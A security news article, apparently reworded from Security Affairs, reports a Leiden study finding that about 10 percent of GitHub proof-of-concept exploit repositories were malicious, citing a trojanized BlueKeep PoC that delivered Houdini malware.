Security Experts Target Malicious CVE PoC Exploit Security Transactions on GitHub

Researchers have discovered thousands of GitHub repositories that provide fake proof-of-concept (PoC) exploits for various flaws used to distribute malware.

A team of researchers from the Institute for Advanced Computer Science in Leiden (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub offering fake proof-of-concept (PoC) for multiple vulnerabilities exploit.

Experts analyzed PoCs shared on GitHub for known vulnerabilities discovered in 2017-2021, some of which repositories were used by threat actors to spread malware.

Experts point out that public code repositories do not guarantee that any given PoC comes from a trusted source.

“We found that not all PoCs are trustworthy. Some proof-of-concepts are fake (i.e. they don’t actually provide PoC functionality) or even malicious: for example, they try to steal data from the system running them, or they try to Install malware on that system.” Read research paper published by experts.

The team focused on a set of symptoms observed in the collected dataset, such as calls to malicious IP addresses, encoded malicious code, or binaries containing trojanized horses. The researchers analyzed 47,313 repositories, of which 4,893 were malicious (ie, 10.3% of research repositories had symptoms of malicious intent).

“This figure shows a worrying prevalence of dangerous malicious PoCs in exploit code distributed on GitHub.” continues the article.

The researchers analyzed a total of 358,277 IP addresses, of which 150,734 were unique and 2,864 were blacklisted. Virus Total flagged 1,522 IP addresses as malicious, of which 1,069 were listed in the AbuseIPDB database.

Of the 150,734 unique IPs extracted, there were 2,864 matching blacklist entries. 1522 malware were detected in Virus Total’s AV scan, compared to 1069 in the AbuseIPDB database.

Most malicious detections are related to vulnerabilities from 2020.

During the research, experts discovered multiple examples of malicious PoCs developed for CVEs and shared some case studies.

One such example is related to the PoC developed for CVE-2019-0708 (also known as BlueKeep).

“This repository was created by a user named Elkhazrajy. The source code contains a base64 line that runs once decoded. It contains another Python script with a link to Pastebin28 which will be saved as a VBScript and then Run by the first exec command. After investigating the VBScript, we found that it contains Houdini malware.” continues this article.

Another example detailed by experts is related to malicious PoCs designed to gather information on targets. In this case, the URL of the server used for the data breach was base64 encoded.

The researchers explained that their study had several limitations. For example, the GitHub API proved unreliable and did not collect all repositories corresponding to the CVE IDs used.

Another limitation is related to the use of heuristics to detect malicious PoCs. Experts explained that this approach could miss some malicious PoCs in their datasets.

“However, this approach cannot detect every malicious PoC based on the source code, as there is always the possibility of finding more creative ways to obfuscate it. We have included code similarity as a measure to help identify new malicious repositories were investigated. Our results show that, in fact, the average similarity between malicious repositories is higher than that of non-malicious repositories.” concluded the experts. “This result is the first step in developing a more robust detection technique.”

The researchers have shared their findings with GitHub, and some malicious repositories have not been removed.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(security affairs Hacking, Malicious GitHub)

Leave a Reply

Your email address will not be published. Required fields are marked *